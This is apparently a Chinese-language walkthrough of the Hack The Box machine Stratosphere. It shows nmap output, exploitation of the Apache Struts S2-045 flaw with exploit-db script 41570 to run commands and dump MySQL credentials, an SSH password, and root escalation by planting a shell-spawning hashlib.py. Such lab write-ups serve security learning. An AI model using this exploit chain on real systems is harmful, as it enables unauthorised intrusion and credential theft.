1、nmap扫描
C:\root> nmap -A 10.10.10.64
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-11 07:43 CST
Nmap scan report for 10.10.10.64 (10.10.10.64)
Host is up (0.33s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey:
| 2048 5b:16:37:d4:3c:18:04:15:c4:02:01:0d:db:07:ac:2d (RSA)
| 256 e3:77:7b:2c:23:b0:8d:df:38:35:6c:40:ab:f6:81:50 (ECDSA)
|_ 256 d7:6b:66:9c:19:fc:aa:66:6c:18:7a:cc:b5:87:0e:40 (ED25519)
80/tcp open http
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 1114
| Date: Wed, 10 Feb 2021 23:44:14 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 404
| Found</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body>
| GetRequest:
| HTTP/1.1 200
| Accept-Ranges: bytes
| ETag: W/"1708-1519762495000"
| Last-Modified: Tue, 27 Feb 2018 20:14:55 GMT
| Content-Type: text/html
| Content-Length: 1708
| Date: Wed, 10 Feb 2021 23:44:11 GMT
| Connection: close
| <!DOCTYPE html>
| <html>
| <head>
| <meta charset="utf-8"/>
| <title>Stratosphere</title>
| <link rel="stylesheet" type="text/css" href="main.css">
| </head>
| <body>
| <div id="background"></div>
| <header id="main-header" class="hidden">
| <div class="container">
| <div class="content-wrap">
| <p><i class="fa fa-diamond"></i></p>
| <nav>
| class="btn" href="GettingStarted.html">Get started</a>
| </nav>
| </div>
| </div>
| </header>
| <section id="greeting">
| <div class="container">
| <div class="content-wrap">
| <h1>Stratosphere<br>We protect your credit.</h1>
| class="btn" href="GettingStarted.html">Get started now</a>
| <p><i class="ar
| HTTPOptions:
| HTTP/1.1 200
| Allow: GET, HEAD, POST, PUT, DELETE, OPTIONS
| Content-Length: 0
| Date: Wed, 10 Feb 2021 23:44:11 GMT
| Connection: close
| RTSPRequest, X11Probe:
| HTTP/1.1 400
| Date: Wed, 10 Feb 2021 23:44:12 GMT
|_ Connection: close
| http-methods:
|_ Potentially risky methods: PUT DELETE
|_http-title: Stratosphere
8080/tcp open http-proxy
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 1114
| Date: Wed, 10 Feb 2021 23:44:12 GMT
| Connection: close
| <!doctype html><html lang="en"><head><t
2、struts渗透
目录扫描到monitor。发现80和8080网页网址后缀跟着.action
如果是开发,接触过这个,那就很轻车熟路了,知道是struts,一般是攻击8080
可以用这个扫是什么版本的漏洞。是中国大神写的
https://github.com/Lucifer1993/struts-scan
python struts-scan.py http://10.10.10.64/Monitoring/example/Welcome.action
发现是045-2.网上有很多,kali也自带
https://www.exploit-db.com/exploits/41570
https://github.com/mazen160/struts-pwn
我以kali自带的41570。试id,成功,ls 查看到有db数据库信息
python 41570.py http://10.10.10.64:8080/Monitoring/example/Welcome.action id
python 41570.py http://10.10.10.64:8080/Monitoring/example/Welcome.action ls
python 41570.py http://10.10.10.64:8080/Monitoring/example/Welcome.action "cat db_connect"
想到扫到ssh登录,但是ssn这个密码不行,还得继续深挖数据库。
一步步来,最后拿到9tc*rhKuG5TyXvUJOrE^5CK7k
,ssh登录成功
python 41570.py http://10.10.10.64:8080/Monitoring/example/Welcome.action 'mysql -uadmin -padmin -e "show databases"'
python 41570.py http://10.10.10.64:8080/Monitoring/example/Welcome.action 'mysql -uadmin -padmin -e "use users;show tables"'
python 41570.py http://10.10.10.64:8080/Monitoring/example/Welcome.action 'mysql -uadmin -padmin -e "use users;select * from accounts"'
3、提权
进去后sudo -l
,提示可以以root身份执行一个py
打开py发现调用hashlib.py。但用ls -ln
查发现没有改它的权限,有就好了,直接插弹shell的代码。就像很多其他靶机一样。
既然没有,就在这个root执行py的同级目录下创一个hashlib.py,记得是home-richard这个目录里,里面插上给shell代码。这样root执行时,优先执行相同目录下的
richard@stratosphere:/home$ cd richard/
richard@stratosphere:~$ echo "import pty; pty.spawn('/bin/sh')" > hashlib.py